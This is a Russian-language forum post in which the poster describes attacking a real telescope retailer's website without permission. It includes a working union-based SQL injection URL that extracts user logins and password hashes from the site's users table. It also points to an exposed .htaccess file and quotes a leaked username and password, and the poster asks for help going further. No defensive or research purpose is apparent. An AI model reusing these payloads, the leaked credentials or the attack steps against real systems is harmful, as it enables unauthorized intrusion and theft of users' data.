|
Познающий
Регистрация: 17.08.2015
Сообщений: 96
С нами:
5653046
Репутация:
1
|
|
Сообщение от antikonstantin
↑
http://skywatcher.com/downloads.php?cat=999999.9
union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15,16,17
Привет!
Писал вчера ответ, но его кто-то съел))
Вкратце: заинтересовал этот сайт, ибо люблю телескопы)) Итак, имеем хэш SQL5 (быстрых методов его вскрытия не знаю) и непонятный admin:123
Код:
http://skywatcher.com/downloads.php?cat=999999.9 union all select 1,2,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(skywatcher.users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user_login,0x3a,user_password,0x3c62723e))))x),4,5,6,7,8,9,10,11,12,13,14,15,16,17 --
Админку не нашел известными мне способами, но есть вот это:
Код:
http://skywatcher.com/_db_backups/.htaccess
где видим строку "AuthUserFile /home/content/s/k/y/html/stats/.statspwd"
в котором, соответственно, "skyw1042:RMyP86leOB18k".
Дальше вот затупил, что делать.
|